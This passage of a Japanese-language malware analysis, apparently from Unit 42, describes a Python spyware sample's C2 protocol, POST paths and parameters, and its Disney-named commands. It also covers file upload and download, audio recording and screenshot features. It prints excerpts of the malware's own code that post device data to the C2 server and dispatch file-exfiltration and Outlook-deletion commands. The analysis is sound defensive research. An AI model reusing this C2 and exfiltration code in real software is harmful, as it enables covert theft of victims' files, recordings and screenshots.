\u30d5\u30a1\u30a4\u30eb\u3002<\/li>\n<li>\u2018beau\u2019\u3001\u2018type\u2019\u3001\u304a\u3088\u3073\u2018FComp\u2019\u306e\u5909\u6570\u3092\u4f7f\u7528\u3057\u305f\u30d5\u30a9\u30fc\u30e0 \u30a8\u30f3\u30b3\u30fc\u30c9 \u30c7\u30fc\u30bf\u3002<\/li>\n<li>\u3053\u306e\u5834\u5408\u306e\u2018beau\u2019\u306e\u3088\u3046\u306b\u3001\u3044\u304f\u3064\u304b\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u8907\u6570\u306e\u69cb\u6210\u8981\u7d20\u3092\u542b\u3081\u308b\u3053\u3068\u304c\u3067\u304d\u3001\u305d\u308c\u3089\u306f\u2018;\u2019\u3092\u4f7f\u7528\u3057\u3066\u533a\u5207\u308a\u307e\u3059\u3002<\/li>\n<\/ul>\n<p>\u5fdc\u7b54\u306e\u53d7\u4fe1\u6642\u306b\u3001\u5b9f\u884c\u3059\u308b\u64cd\u4f5c\u304c\u542b\u307e\u308c\u3066\u3044\u305f\u5fdc\u7b54\u306f\u3001\u533a\u5207\u308a\u6587\u5b57\u3068\u3057\u3066\u2018;\u2019\u3092\u4f7f\u7528\u3057\u3066\u533a\u5207\u3063\u305f\u69cb\u6210\u8981\u7d20\u3092\u6301\u3064\u6587\u5b57\u5217\u306b\u3088\u3063\u3066\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u3001\u4ee5\u4e0b\u306e\u30b3\u30fc\u30c9\u30b9\u30cb\u30da\u30c3\u30c8\u306f\u3001C2\u30aa\u30da\u30ec\u30fc\u30bf\u3068\u306e\u901a\u4fe1\u3068\u3001\u5fdc\u7b54\u306e\u51e6\u7406\u65b9\u6cd5\u3092\u793a\u3057\u3066\u3044\u307e\u3059(\u7c21\u6f54\u306b\u3059\u308b\u305f\u3081\u306b\u8208\u5473\u6df1\u3044\u90e8\u5206\u306e\u307f\u8a18\u8f09\u3057\u3066\u3044\u307e\u3059)\u3002<\/p>\n<pre class=\"lang:python decode:true \">ur = requests.post(url, data={'beau': name_device + ';' + str(getLastModDir(4))})\r\n   resArr = ur.text\r\n   Im_extin = resArr.split(';')[0]\r\n   if ur.status_code == 200:\r\n       if resArr == 'Lee':\r\n           register_new_device(FranDrescher)\r\n       elif resArr == 'Melissa':\r\n           pass\r\n       elif resArr == 'Renee':\r\n           status = Delete_Request(Im_extin)\r\n       elif resArr == 'nero':\r\n           pass\r\n  else:\r\n           Im_extintion = resArr.split(';')[1]\r\n           if Im_extintion == 'Rapunzel':\r\n               path = args_parser(MyFolderName)\r\n               status = Upload_File('else', path, FranDrescher, Im_extin)\r\n               if status:\r\n                   status = Delete_Request(Im_extin)\r\n               if Im_extintion == 'Gal_Gadot':\r\n                   path = Sec_Shot(MyFolderName)\r\n                   status = Upload_File('lucretia', path, FranDrescher, Im_extin)\r\n                   if status:\r\n                       status = Delete_Request(Im_extin)\r\n\r\n...\r\n...\r\n...\r\n\r\nif Im_extintion == 'Ed_ONeill':\r\n                   F_Out = resArr.split(';')[2]\r\n                   src_B = base64ToString(F_Out)\r\n                   if src_B == 'delete':\r\n                       status = Del_Outlook()\r\n                   else:\r\n...\r\n...\r\n...\r\nif Im_extintion == 'groot':\r\n                   src_path = resArr.split(';')[2]\r\n                   dist_path = resArr.split(';')[3]\r\n                   src_B = base64ToString(src_path)\r\n                   src_B_D = base64ToString(dist_path)\r\n                   if os.path.exists(src_B) and os.path.exists(src_B_D\r\n<\/pre>\n<p>\u3053\u306e\u5fdc\u7b54\u306f\u3001\u2018;\u2019\u533a\u5207\u308a\u6587\u5b57\u3067\u533a\u5207\u3089\u308c\u3001\u305d\u306e\u4f4d\u7f6e\u306b\u5fdc\u3058\u3066\u3001\u5404\u72b6\u6cc1\u306b\u3088\u3063\u3066\u30d7\u30ec\u30fc\u30f3\u30c6\u30ad\u30b9\u30c8\u307e\u305f\u306fbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3067\u53d7\u4fe1\u3067\u304d\u308b\u30d1\u30e9\u30e1\u30fc\u30bf\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<p>\u4ee5\u4e0b\u306e\u8868\u306f\u3001C2\u3068\u306e\u3084\u308a\u53d6\u308a\u3067\u4f7f\u7528\u3059\u308b\u30d1\u30b9\u3068\u30d1\u30e9\u30e1\u30fc\u30bf\u3001\u304a\u3088\u3073\u305d\u308c\u3089\u306e\u6a5f\u80fd\u306e\u6982\u8981\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<table style=\"width: 99.2789%;\">\n<tbody>\n<tr>\n<td style=\"width: 37.9585%;\"><strong>\u30d1\u30b9<\/strong><\/td>\n<td style=\"width: 31.8979%;\"><strong>\u30e1\u30bd\u30c3\u30c9<\/strong><\/td>\n<td style=\"width: 186.124%;\"><strong>\u5909\u6570<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/samantha<\/td>\n<td style=\"width: 31.8979%;\">\u8981\u6c42\u306e\u524a\u9664\u3002\u767b\u9332\u89e3\u9664\u3002<\/td>\n<td style=\"width: 186.124%;\">beau<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/lashawna<\/td>\n<td style=\"width: 31.8979%;\">\u30c7\u30d0\u30a4\u30b9\u306e\u767b\u9332\u3002<\/td>\n<td style=\"width: 186.124%;\">beau<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/matheny<\/td>\n<td style=\"width: 31.8979%;\">\u30b3\u30de\u30f3\u30c9\u51fa\u529b\u30c7\u30fc\u30bf\u306e\u9001\u4fe1\u3002<\/td>\n<td style=\"width: 186.124%;\">beau\u3001terrel<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/uiasfvz<\/td>\n<td style=\"width: 31.8979%;\">USB\u30c7\u30d0\u30a4\u30b9\u60c5\u5831<\/td>\n<td style=\"width: 186.124%;\">beau\u3001type<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/daryl<\/td>\n<td style=\"width: 31.8979%;\">\u8981\u6c42\u306e\u524a\u9664\u3002<\/td>\n<td style=\"width: 186.124%;\">arturo\u3001beau<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/qprbudls<\/td>\n<td style=\"width: 31.8979%;\">\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3002<\/td>\n<td style=\"width: 186.124%;\">beau<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/nyrvoz<\/td>\n<td style=\"width: 31.8979%;\">\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9URL\u3002<\/td>\n<td style=\"width: 186.124%;\">beau<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 37.9585%;\">\/zoailloaze\/sfuxmiibif\/hortense1<\/td>\n<td style=\"width: 31.8979%;\">\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<td style=\"width: 186.124%;\">beau\u3001type\u3001FComp\u3001terrel<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><a id=\"post-110155-_30j0zll\"><\/a><span style=\"font-size: 12pt;\"><sup><span style=\"color: #999999;\"><em>\u88684 C2\u3068\u306e\u3084\u308a\u53d6\u308a\u3067\u4f7f\u7528\u3055\u308c\u308b\u30d0\u30b9\u3068\u30d1\u30e9\u30e1\u30fc\u30bf\u3001\u304a\u3088\u3073\u305d\u308c\u3089\u306e\u6a5f\u80fd<\/em><\/span><\/sup><\/span><\/p>\n<h6><strong>C2\u30aa\u30da\u30ec\u30fc\u30bf\u3068\u306e\u3084\u308a\u53d6\u308a<\/strong><\/h6>\n<p>\u30e1\u30a4\u30f3\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u30eb\u30fc\u30d7\u306b\u57fa\u3065\u3044\u3066\u3001C2\u30b5\u30fc\u30d0\u30fc\u306e\u5b9a\u671f\u7684\u306a\u547c\u3073\u51fa\u3057\u304c\u3042\u308a\u3001\u305d\u308c\u306f\u30c7\u30d0\u30a4\u30b9\u306b\u95a2\u3059\u308b\u60c5\u5831(\u30c7\u30d0\u30a4\u30b9\u8b58\u5225\u5b50)\u304a\u3088\u3073\u30c7\u30a3\u30b9\u30af\u306e\u6700\u5f8c\u306e\u5909\u66f4\u6642\u523b\u306e\u9001\u4fe1\u306b\u3088\u3063\u3066\u958b\u59cb\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:python decode:true\">def Chick_Request():\r\n   global FranDrescher\r\n   global WD\r\n   global Wv\r\n   url = FranDrescher + '\/zoailloaze\/sfuxmiibif\/lashawna'\r\n   ur = requests.post(url, data={'beau': name_device + ';' + str(getLastModDir(4))})\r\n   resArr = ur.text\r\n   Im_extin = resArr.split(';')[0]\r\n<\/pre>\n<p><span style=\"font-family: georgia, palatino, serif;\">\u8208\u5473\u6df1\u3044\u306e\u306f\u3001\u3053\u308c\u304c\u6700\u5f8c\u306e\u30c7\u30a3\u30b9\u30af\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u65e5\u4ed8\u3092\u30ad\u30e3\u30d7\u30c1\u30e3\u3059\u308b\u65b9\u6cd5\u3067\u3059\u3002\u3053\u306e\u30b3\u30fc\u30c9\u306f\u3001\u305d\u308c\u304c\u672a\u5b8c\u6210\u3067\u3042\u308b\u3053\u3068\u3092\u793a\u3057\u3001\u3053\u306e\u5834\u5408\u3001\u30bf\u30a4\u30d7\u306f\u20184\u2019\u3067\u3042\u308a\u3001\u65e5\u4ed8\u306e\u4ee3\u308f\u308a\u306b\u5e38\u306b\u6587\u5b57\u5217\u2018empty\u2019\u3092\u8fd4\u3057\u307e\u3059\u3002<\/span><\/p>\n<pre class=\"lang:python decode:true\">def getLastModDir(type):\r\n   try:\r\n       c = wmi.WMI()\r\n       Mv = ''\r\n       for drive in c.Win32_LogicalDisk(DriveType=type):\r\n           Mv = drive.Caption\r\n\r\n       last_date = ''\r\n       dirpath = Mv\r\n       entries = (os.path.join(dirpath, fn) for fn in os.listdir(dirpath))\r\n       entries = ((os.stat(path), path) for path in entries)\r\n       entries = ((stat[ST_MTIME], path) for stat, path in entries if S_ISREG(stat[ST_MODE]))\r\n       for cdate, path in entries:\r\n           last_date = datetime.datetime.fromtimestamp(cdate)\r\n\r\n       if type == 4:\r\n           return 'empty'\r\n       return last_date\r\n   except Exception as e:\r\n       return 'empty'\r\n<\/pre>\n<p>\u30b3\u30fc\u30c9\u5168\u4f53\u3067\u3053\u306e\u3088\u3046\u306a\u5b9f\u88c5\u306e\u4f8b\u306f\u8907\u6570\u3042\u308a\u307e\u3059\u3002\u305d\u308c\u306f\u3001\u672a\u5b8c\u6210\u307e\u305f\u306f\u7d99\u7d9a\u4e2d\u306e\u5b9f\u88c5\u3092\u793a\u3057\u3001\u653b\u6483\u8005\u304c\u305d\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u30a2\u30af\u30c6\u30a3\u30d6\u306b\u958b\u767a\u4e2d\u3067\u3042\u308b\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u524d\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001\u5fdc\u7b54\u6587\u5b57\u5217\u306f\u533a\u5207\u308a\u6587\u5b57\u3067\u533a\u5207\u3089\u308c\u3001C2\u30aa\u30da\u30ec\u30fc\u30bf\u306b\u3088\u3063\u3066\u9001\u4fe1\u3055\u308c\u305f\u30b3\u30de\u30f3\u30c9\u304a\u3088\u3073\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30d1\u30e9\u30e1\u30fc\u30bf\u304c\u89e3\u6790\u3055\u308c\u307e\u3059\u3002\u8208\u5473\u6df1\u3044\u306e\u306f\u3001\u30b3\u30de\u30f3\u30c9\u5185\u306bDisney\u306e\u8a00\u53ca\u304c\u591a\u6570\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u3067\u3059(\u904e\u53bb\u306b\u306f\u3001\u305f\u3068\u3048\u3070The Big Bang Theory\u3084Game of Thrones\u306a\u3069\u306e\u30ad\u30e3\u30e9\u30af\u30bf\u30fc\u306b\u8a00\u53ca\u3059\u308b\u5909\u6570\u304c\u4f7f\u7528\u3055\u308c\u305fAridViper\u304c\u3042\u308a\u307e\u3057\u305f)\u3002<\/p>\n<figure id=\"attachment_110198\" aria-describedby=\"caption-attachment-110198\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110199 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-202.png\" alt=\"\u3053\u3053\u306b\u793a\u3059C2\u30b3\u30de\u30f3\u30c9\u306e\u30ea\u30b9\u30c8\u306b\u306f\u3001Disney\u306e\u8a00\u53ca\u304c\u8907\u6570\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"1191\" \/><figcaption id=\"caption-attachment-110198\" class=\"wp-caption-text\">\u56f321.C2\u30b3\u30de\u30f3\u30c9\u306e\u4f8b<\/figcaption><\/figure>\n<p>\u672a\u5b8c\u6210\u306e\u30b3\u30fc\u30c9\u306b\u95a2\u3059\u308b\u3082\u30461\u3064\u306e\u8208\u5473\u6df1\u3044\u4f8b\u306f\u3001C2\u306e\u5b9f\u88c5\u306b\u542b\u307e\u308c\u308b\u4e00\u90e8\u306e\u5206\u5c90\u3068\u6a5f\u80fd\u3092\u30b3\u30fc\u30c9\u304c\u901a\u904e\u3067\u304d\u306a\u3044\u3068\u3044\u3046\u4e8b\u5b9f\u3067\u3059\u3002\u305f\u3068\u3048\u3070\u3001\u4ee5\u4e0b\u306e\u30b3\u30fc\u30c9\u30b9\u30cb\u30da\u30c3\u30c8\u3067\u306f\u3001\u30b3\u30fc\u30c9\u304c\u201cMulan\u201d\u5206\u5c90\u306b\u5165\u308b\u3068\u3001\u201cVanellope\u201d\u30b3\u30fc\u30c9\u30d6\u30ed\u30c3\u30af\u306b\u306f\u5165\u308a\u307e\u305b\u3093\u3002<\/p>\n<pre class=\"lang:python decode:true\">if Im_extintion == 'Mulan':\r\n    path = Process_list(MyFolderName)\r\n    status = Upload_File('else', path, FranDrescher, Im_extin)\r\n    if status:\r\n        status = Delete_Request(Im_extin)\r\n    if Im_extintion == 'Mulan_Fire':\r\n        K_process('firefox.exe')\r\n        Compress_File_Rar_WithoutDel2()\r\n        status = Delete_Request(Im_extin)\r\n    if Im_extintion == 'Vanellope':\r\n        path = Get_ImgType(MyFolderName)\r\n        status = Upload_File('else', path, FranDrescher, Im_extin)\r\n        if status:\r\n            status = Delete_Request(Im_extin)\r\n        if Im_extintion == 'Calhoun':\r\n            path = Get_VedioType(MyFolderName)\r\n            status = Upload_File('else', path, FranDrescher, Im_extin)\r\n            if status:\r\n                status = Delete_Request(Im_extin)\r\n<\/pre>\n<p>\u3053\u308c\u3082\u3001\u5b9f\u88c5\u304c\u672a\u5b8c\u6210\u3067\u3001\u958b\u767a\u4e2d\u3067\u3042\u308b\u53ef\u80fd\u6027\u3092\u793a\u3059\u30b7\u30b0\u30ca\u30eb\u3067\u3059\u3002<\/p>\n<p>\u88682\u306f\u3001\u30b3\u30fc\u30c9\u306e\u5b9f\u884c\u306b\u3088\u3063\u3066\u5230\u9054\u53ef\u80fd\u306a\u30b3\u30de\u30f3\u30c9\u306e\u6982\u8981\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h4><strong>\u60c5\u5831\u7a83\u53d6\u304a\u3088\u3073\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u306e\u6a5f\u80fd<\/strong><\/h4>\n<p>\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u3001\u73fe\u5728\u306eC2\u5b9f\u88c5\u3067\u5230\u9054\u53ef\u80fd\u304b\u3069\u3046\u304b\u306b\u95a2\u4fc2\u306a\u304f\u3001\u4ee5\u4e0b\u3092\u542b\u3080\u3055\u307e\u3056\u307e\u306a\u60c5\u5831\u7a83\u53d6\u304a\u3088\u3073\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u306e\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u3002\u5f8c\u7d9a\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2 \u30d5\u30a1\u30df\u30ea\u306e\u5b9f\u88c5\u65b9\u6cd5\u3092\u53ef\u8996\u5316\u3059\u308b\u305f\u3081\u306b\u3001\u6700\u3082\u95a2\u9023\u6027\u306e\u5f37\u3044\u6a5f\u80fd\u306e\u307f\u3092\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<h6><strong>\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0<\/strong><\/h6>\n<p>\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306f\u3001<a href=\"https:\/\/pypi.org\/project\/PyAudio\/\">pyaudio<\/a>\u304a\u3088\u3073<a href=\"https:\/\/docs.python.org\/3\/library\/wave.html\">wave<\/a> Python\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u5b9f\u73fe\u3055\u308c\u307e\u3059\u3002\u30c7\u30fc\u30bf\u306f\u201cDevNameSound\u201d\u30d5\u30a9\u30eb\u30c0\u306b\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110200\" class=\"wp-caption aligncenter\" style=\"width: 900px;\" aria-describedby=\"caption-attachment-110200\"><img  class=\"wp-image-110201 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-203.png\" alt=\"\u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306f\u3001pyaudio\u304a\u3088\u3073wave Python\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u5b9f\u73fe\u3055\u308c\u307e\u3059\u3002\u30c7\u30fc\u30bf\u306f\u201cDevNameSound\u201d\u30d5\u30a9\u30eb\u30c0\u306b\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002 \" width=\"900\" height=\"804\" \/><figcaption id=\"caption-attachment-110200\" class=\"wp-caption-text\">\u56f322 \u97f3\u58f0\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306e\u5b9f\u88c5<\/figcaption><\/figure>\n<p>\u30ec\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u306f\u3001\u5bfe\u5fdc\u3059\u308b\u30d5\u30a9\u30eb\u30c0\u306b\u683c\u7d0d\u3055\u308c\u3001\u5b9f\u884c\u4e2d\u306e\u30b9\u30ec\u30c3\u30c9\u3068\u30aa\u30da\u30ec\u30fc\u30bf\u30b3\u30de\u30f3\u30c9\u306b\u3088\u3063\u3066\u3001\u30ad\u30e3\u30d7\u30c1\u30e3\u3055\u308c\u305f\u60c5\u5831\u306e\u53d6\u5f97\u304c\u53ef\u80fd\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<h6><strong>\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u6a5f\u80fd<\/strong><\/h6>\n<p>C2\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u6a5f\u80fd\u306f\u3001\u4ee5\u4e0b\u306eURL\u30d1\u30b9\u3078\u306ePOST\u8981\u6c42\u306b\u3088\u3063\u3066\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">\/zoailloaze\/sfuxmiibif\/qprbudls<\/span><\/p>\n<p>POST\u8981\u6c42\u306e\u4e00\u90e8\u3068\u3057\u3066\u3001\u201cbeau\u201d\u3068\u3044\u3046\u540d\u524d\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u30bf\u30a4\u30d7\u304c\u6307\u5b9a\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5024\u306b\u5fdc\u3058\u3066\u3001\u7279\u5b9a\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304a\u3088\u3073\u7279\u5b9a\u306eURL\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002\u30b3\u30fc\u30c9\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110202\" aria-describedby=\"caption-attachment-110202\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110203 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-204.png\" alt=\"POST\u8981\u6c42\u306e\u4e00\u90e8\u3068\u3057\u3066\u3001\u201cbeau\u201d\u3068\u3044\u3046\u540d\u524d\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u30bf\u30a4\u30d7\u304c\u6307\u5b9a\u3055\u308c\u307e\u3059\u3002\u3053\u3053\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u305d\u306e\u5024\u306b\u5fdc\u3058\u3066\u3001\u7279\u5b9a\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304a\u3088\u3073\u7279\u5b9a\u306eURL\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002\" width=\"900\" height=\"476\" \/><figcaption id=\"caption-attachment-110202\" class=\"wp-caption-text\">\u56f323.\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30b3\u30fc\u30c9\u306e\u4f8b<\/figcaption><\/figure>\n<table style=\"width: 98.9318%;\">\n<tbody>\n<tr>\n<td style=\"width: 30.254%;\"><strong>\u201cbeau\u201d\u306e\u5024<\/strong><\/td>\n<td style=\"width: 339.954%;\"><strong>\u30a2\u30af\u30b7\u30e7\u30f3<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 30.254%;\">\u20181\u2019<\/td>\n<td style=\"width: 339.954%;\">\u6b63\u5f53\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u307e\u305f\u306frar.exe\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 30.254%;\">\u20182\u2019<\/td>\n<td style=\"width: 339.954%;\">MetroIntelGenericUIFram.exe\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 30.254%;\">\u20183\u2019<\/td>\n<td style=\"width: 339.954%;\">SynLocSynMomentum.exe\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 30.254%;\">\u7279\u5b9a\u306eURL<\/td>\n<td style=\"width: 339.954%;\">\u6307\u5b9a\u3055\u308c\u305fURL\u304b\u3089\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><sup><span style=\"color: #999999;\"><em>\u88685 \u30b5\u30f3\u30d7\u30eb\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u306e\u305f\u3081\u306e\u201cbeau\u201d\u306e\u5024<\/em><\/span><\/sup><\/span><\/p>\n<h6><strong>\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 <\/strong><\/h6>\n<p>\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u3055\u307e\u3056\u307e\u306a\u30d5\u30a9\u30eb\u30c0\u306b\u914d\u7f6e\u3055\u308c\u3066\u3044\u308b\u5727\u7e2e\u6e08\u307f\u30b5\u30f3\u30d7\u30eb\u3092\u5b9a\u671f\u7684\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30b9\u30ec\u30c3\u30c9\u3092\u958b\u59cb\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110204\" aria-describedby=\"caption-attachment-110204\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110205 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-205.png\" alt=\"\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001\u3055\u307e\u3056\u307e\u306a\u30d5\u30a9\u30eb\u30c0\u306b\u914d\u7f6e\u3055\u308c\u3066\u3044\u308b\u5727\u7e2e\u6e08\u307f\u30b5\u30f3\u30d7\u30eb\u3092\u5b9a\u671f\u7684\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30b9\u30ec\u30c3\u30c9\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\" width=\"900\" height=\"928\" \/><figcaption id=\"caption-attachment-110204\" class=\"wp-caption-text\">\u56f324.\u30b5\u30f3\u30d7\u30eb\u306b\u3088\u3063\u3066\u521d\u671f\u5316\u3055\u308c\u308b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u30b9\u30ec\u30c3\u30c9<\/figcaption><\/figure>\n<p>\u30d5\u30a1\u30a4\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306f\u3001\u4ee5\u4e0b\u306e\u30d1\u30b9\u306b\u5bfe\u3059\u308bPOST\u8981\u6c42\u306b\u3088\u3063\u3066\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">\/zoailloaze\/sfuxmiibif\/hortense1<\/span><\/p>\n<p>\u30c7\u30fc\u30bf\u306f\u3001\u201c;\u201d\u3067\u533a\u5207\u3063\u305f\u8907\u6570\u306e\u5909\u6570\u3092\u8a2d\u5b9a\u3067\u304d\u308bPOST\u30d1\u30e9\u30e1\u30fc\u30bf\u201cbeau\u201d\u306b\u3088\u3063\u3066\u6307\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u201cterrel\u201d\u3068\u3044\u3046POST\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u6307\u5b9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u3053\u3053\u3067\u8ff0\u3079\u305f\u30b9\u30ec\u30c3\u30c9\u3001\u304a\u3088\u3073C2\u3068\u306e\u3084\u308a\u53d6\u308a\u3092\u901a\u3058\u305f\u30aa\u30da\u30ec\u30fc\u30bf\u304c\u3001\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u30b3\u30fc\u30c9\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u4ee5\u4e0b\u306f\u3001\u3053\u306e\u5b9f\u88c5\u3092\u89b3\u6e2c\u3067\u304d\u308b\u305d\u306e\u3088\u3046\u306a\u30e1\u30bd\u30c3\u30c9\u306e\u4f8b\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_110206\" aria-describedby=\"caption-attachment-110206\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110207 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-206.png\" alt=\"\u3053\u3053\u3067\u8ff0\u3079\u305f\u30b9\u30ec\u30c3\u30c9\u3001\u304a\u3088\u3073C2\u3068\u306e\u3084\u308a\u53d6\u308a\u3092\u901a\u3058\u305f\u30aa\u30da\u30ec\u30fc\u30bf\u304c\u3001\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u30b3\u30fc\u30c9\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u3053\u3053\u306b\u793a\u3059\u4f8b\u3067\u3001\u5b9f\u88c5\u3092\u89b3\u6e2c\u3067\u304d\u307e\u3059\u3002 \" width=\"900\" height=\"562\" \/><figcaption id=\"caption-attachment-110206\" class=\"wp-caption-text\">\u56f325.\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u30e1\u30bd\u30c3\u30c9\u306e\u4f8b<\/figcaption><\/figure>\n<h6><strong>\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u6a5f\u80fd<\/strong><\/h6>\n<p>\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u306f\u3001Python\u306e<a 